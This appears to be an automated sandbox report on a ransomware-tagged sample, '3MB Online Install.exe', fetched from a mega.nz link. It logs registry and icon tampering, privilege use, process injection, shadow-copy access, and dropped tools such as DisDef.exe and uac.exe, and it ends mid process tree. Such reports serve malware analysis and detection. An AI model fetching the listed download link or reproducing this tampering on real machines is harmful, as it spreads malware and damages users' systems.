Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	ie4uinit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1"	ie4uinit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListTTL = "0"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Capabilities	ie4uinit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListTTL = "0"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Main	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	ie4uinit.exe

Modifies Shortcut Icons 2 IoCs

Modifies/removes arrow indicator from shortcut icons.

ransomware

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\29 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\29 = "C:\\java\\icons\\5.ico"	reg.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\wordmhtmlfile\DefaultIcon\ = "C:\\java\\icons\\2.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wordpad.Document.1\DefaultIcon\ = "C:\\java\\icons\\2.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\ = "C:\\java\\icons\\6.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Windows.VhdFile\DefaultIcon\ = "C:\\java\\icons\\6.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ms-publisher\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-1430448594-2639229838-973813799-439329657-1197984847-4069167804-1277922394\DisplayName = "windows_ie_ac_001"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon\ = "C:\\java\\icons\\1.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\wordhtmlfile\DefaultIcon\ = "C:\\java\\icons\\2.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\ = "C:\\java\\icons\\2.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\themefile\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Word.RTF.8\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\docxfile\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\ = "C:\\java\\icons\\1.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\wordmhtmlfile\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\wordmhtmlfile\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Paint.Picture\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\wordxmlfile\DefaultIcon\ = "C:\\java\\icons\\2.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AutoHotkeyScript\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MSInfoFile\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\java\\icons\\1.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\themepackfile\DefaultIcon\ = "C:\\java\\icons\\6.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ftp\DefaultIcon\ = "C:\\java\\icons\\2.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\java\\icons\\1.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AutoHotkeyScript\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\https\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Word.Document.8\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MSInfoFile\DefaultIcon\ = "C:\\java\\icons\\6.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\wordhtmltemplate\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DVD\DefaultIcon\ = "C:\\java\\icons\\2.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SearchFolder\DefaultIcon\ = "C:\\java\\icons\\6.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\wordhtmltemplate\DefaultIcon\ = "C:\\java\\icons\\2.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SearchFolder\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1474490143-3221292397-4168103503-1000\{3396E05F-2FC8-4243-8ED8-3E9624F60F08}	VideoPlayer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\ = "C:\\java\\icons\\6.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\steamlink\DefaultIcon\ = "C:\\java\\icons\\6.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\steam	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\bittorrent\DefaultIcon\ = "C:\\java\\icons\\2.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\ = "C:\\java\\icons\\2.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "C:\\java\\icons\\1.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Paint.Picture\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\txtfile	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AutoHotkeyScript\DefaultIcon\ = "C:\\java\\icons\\2.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "C:\\java\\icons\\2.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ftp\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1474490143-3221292397-4168103503-1000\{93CA6E04-108E-40C8-BC42-3D2988B41DFA}	VideoPlayer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\steamlink	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ms-access\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\blendfile\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\blendfile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\bittorrent	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DVD\DefaultIcon\ = "C:\\java\\icons\\2.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\wordxmlfile\DefaultIcon\ = "C:\\java\\icons\\2.ico"	reg.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
5628	reg.exe
644	reg.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 869377.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\3MB Online Install.exe:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
2012	msedge.exe
2012	msedge.exe
4432	msedge.exe
4432	msedge.exe
3076	msedge.exe
3076	msedge.exe
492	identity_helper.exe
492	identity_helper.exe
3936	msedge.exe
3936	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
4800	VideoPlayer.exe
4800	VideoPlayer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	1404	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1404	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	2104	WMIC.exe
Token: SeSecurityPrivilege	2104	WMIC.exe
Token: SeTakeOwnershipPrivilege	2104	WMIC.exe
Token: SeLoadDriverPrivilege	2104	WMIC.exe
Token: SeSystemProfilePrivilege	2104	WMIC.exe
Token: SeSystemtimePrivilege	2104	WMIC.exe
Token: SeProfSingleProcessPrivilege	2104	WMIC.exe
Token: SeIncBasePriorityPrivilege	2104	WMIC.exe
Token: SeCreatePagefilePrivilege	2104	WMIC.exe
Token: SeBackupPrivilege	2104	WMIC.exe
Token: SeRestorePrivilege	2104	WMIC.exe
Token: SeShutdownPrivilege	2104	WMIC.exe
Token: SeDebugPrivilege	2104	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2104	WMIC.exe
Token: SeRemoteShutdownPrivilege	2104	WMIC.exe
Token: SeUndockPrivilege	2104	WMIC.exe
Token: SeManageVolumePrivilege	2104	WMIC.exe
Token: 33	2104	WMIC.exe
Token: 34	2104	WMIC.exe
Token: 35	2104	WMIC.exe
Token: 36	2104	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2104	WMIC.exe
Token: SeSecurityPrivilege	2104	WMIC.exe
Token: SeTakeOwnershipPrivilege	2104	WMIC.exe
Token: SeLoadDriverPrivilege	2104	WMIC.exe
Token: SeSystemProfilePrivilege	2104	WMIC.exe
Token: SeSystemtimePrivilege	2104	WMIC.exe
Token: SeProfSingleProcessPrivilege	2104	WMIC.exe
Token: SeIncBasePriorityPrivilege	2104	WMIC.exe
Token: SeCreatePagefilePrivilege	2104	WMIC.exe
Token: SeBackupPrivilege	2104	WMIC.exe
Token: SeRestorePrivilege	2104	WMIC.exe
Token: SeShutdownPrivilege	2104	WMIC.exe
Token: SeDebugPrivilege	2104	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2104	WMIC.exe
Token: SeRemoteShutdownPrivilege	2104	WMIC.exe
Token: SeUndockPrivilege	2104	WMIC.exe
Token: SeManageVolumePrivilege	2104	WMIC.exe
Token: 33	2104	WMIC.exe
Token: 34	2104	WMIC.exe
Token: 35	2104	WMIC.exe
Token: 36	2104	WMIC.exe
Token: SeBackupPrivilege	3372	vssvc.exe
Token: SeRestorePrivilege	3372	vssvc.exe
Token: SeAuditPrivilege	3372	vssvc.exe
Token: SeRestorePrivilege	980	7z.exe
Token: 35	980	7z.exe
Token: SeSecurityPrivilege	980	7z.exe
Token: SeSecurityPrivilege	980	7z.exe
Token: SeDebugPrivilege	5880	taskkill.exe
Token: SeIncreaseQuotaPrivilege	5320	WMIC.exe
Token: SeSecurityPrivilege	5320	WMIC.exe
Token: SeTakeOwnershipPrivilege	5320	WMIC.exe
Token: SeLoadDriverPrivilege	5320	WMIC.exe
Token: SeSystemProfilePrivilege	5320	WMIC.exe
Token: SeSystemtimePrivilege	5320	WMIC.exe
Token: SeProfSingleProcessPrivilege	5320	WMIC.exe
Token: SeIncBasePriorityPrivilege	5320	WMIC.exe
Token: SeCreatePagefilePrivilege	5320	WMIC.exe
Token: SeBackupPrivilege	5320	WMIC.exe
Token: SeRestorePrivilege	5320	WMIC.exe
Token: SeShutdownPrivilege	5320	WMIC.exe

Suspicious use of FindShellTrayWindow 61 IoCs

pid	Process
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
5708	hide.exe
5436	mpv.exe
5436	mpv.exe
3268	hide.exe
2240	mpv.exe
2240	mpv.exe
5036	hide.exe
4992	hide.exe
3304	hide.exe
1632	hide.exe
480	hide.exe
3712	hide.exe
5792	hide.exe
1844	mpv.exe
1844	mpv.exe
5612	hide.exe
4828	mpv.exe
4828	mpv.exe

Suspicious use of SendNotifyMessage 16 IoCs

pid	Process
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
1596	3MB Online Install.exe
672	Start.exe
3372	curl.exe
1608	Driver.exe
3040	3MB Online Install.exe
2300	Start.exe
1612	curl.exe
1600	clown.exe
1276	startban.exe
1328	def.exe
1736	startcur.exe
2404	startkey.exe
744	ban.exe
4264	DisDef.exe
248	ban.exe
4736	key.exe
248	ban.exe
980	7z.exe
2600	startuac.exe
2364	startauto.exe
3040	startWinlog.exe
3792	startExplorerIcons.exe
3020	startdelstartup.exe
3412	starticons.exe
5136	auto.exe
5144	uac.exe
5256	ExplorerIcons.exe
5320	delstartup.exe
5508	icons.exe
5804	starthosts.exe
5848	startWPChanger.exe
5860	clown.exe
6128	startvol.exe
6136	startScreenBlocker.exe
1064	startcur.exe
1428	attention.exe
5504	hosts.exe
4132	startWinlog.exe
3004	startf.exe
4492	startban.exe
2972	wp.exe
4084	vol.exe
4468	ban.exe
5140	ban.exe
1788	f.exe
5140	ban.exe
6004	wp.exe
5436	mpv.exe
5436	mpv.exe
1752	Driver.exe
4040	clown.exe
5768	def.exe
5036	startcur.exe
1996	startban.exe
5868	startkey.exe
6012	ban.exe
5680	key.exe
5520	DisDef.exe
5524	ban.exe
5524	ban.exe
5216	7z.exe
5688	startdelstartup.exe
5444	startuac.exe
5740	startauto.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4432 wrote to memory of 3260	4432	msedge.exe	78
PID 4432 wrote to memory of 3260	4432	msedge.exe	78
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 1920	4432	msedge.exe	80
PID 4432 wrote to memory of 2012	4432	msedge.exe	81
PID 4432 wrote to memory of 2012	4432	msedge.exe	81
PID 4432 wrote to memory of 2908	4432	msedge.exe	82
PID 4432 wrote to memory of 2908	4432	msedge.exe	82
PID 4432 wrote to memory of 2908	4432	msedge.exe	82
PID 4432 wrote to memory of 2908	4432	msedge.exe	82
PID 4432 wrote to memory of 2908	4432	msedge.exe	82
PID 4432 wrote to memory of 2908	4432	msedge.exe	82
PID 4432 wrote to memory of 2908	4432	msedge.exe	82
PID 4432 wrote to memory of 2908	4432	msedge.exe	82
PID 4432 wrote to memory of 2908	4432	msedge.exe	82
PID 4432 wrote to memory of 2908	4432	msedge.exe	82
PID 4432 wrote to memory of 2908	4432	msedge.exe	82
PID 4432 wrote to memory of 2908	4432	msedge.exe	82
PID 4432 wrote to memory of 2908	4432	msedge.exe	82
PID 4432 wrote to memory of 2908	4432	msedge.exe	82
PID 4432 wrote to memory of 2908	4432	msedge.exe	82
PID 4432 wrote to memory of 2908	4432	msedge.exe	82
PID 4432 wrote to memory of 2908	4432	msedge.exe	82
PID 4432 wrote to memory of 2908	4432	msedge.exe	82
PID 4432 wrote to memory of 2908	4432	msedge.exe	82
PID 4432 wrote to memory of 2908	4432	msedge.exe	82

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/zEch1KxI#B3YpDGY2n4etjH6ApJ1WtcW82yTAOg48vgpSSZ6vlRY
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffee72b3cb8,0x7ffee72b3cc8,0x7ffee72b3cd8
  2⤵
  PID:3260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,7724563417088901123,10205760120393203350,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
  2⤵
  PID:1920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,7724563417088901123,10205760120393203350,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,7724563417088901123,10205760120393203350,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:8
  2⤵
  PID:2908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,7724563417088901123,10205760120393203350,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
  2⤵
  PID:2300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,7724563417088901123,10205760120393203350,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
  2⤵
  PID:4416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,7724563417088901123,10205760120393203350,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
  2⤵
  PID:1028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,7724563417088901123,10205760120393203350,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1
  2⤵
  PID:2184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1900,7724563417088901123,10205760120393203350,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5052 /prefetch:8
  2⤵
  PID:4616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,7724563417088901123,10205760120393203350,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
  2⤵
  PID:4648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,7724563417088901123,10205760120393203350,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
  2⤵
  PID:1324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,7724563417088901123,10205760120393203350,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5272 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,7724563417088901123,10205760120393203350,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
  2⤵
  PID:4492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1900,7724563417088901123,10205760120393203350,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6064 /prefetch:8
  2⤵
  PID:2252
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,7724563417088901123,10205760120393203350,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6412 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,7724563417088901123,10205760120393203350,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5964 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3936
- C:\Users\Admin\Downloads\3MB Online Install.exe
  "C:\Users\Admin\Downloads\3MB Online Install.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1596
- - C:\ProgramData\Drivers\Start.exe
    "C:\ProgramData\Drivers\Start.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:672
  - - C:\Windows\system32\cmd.exe
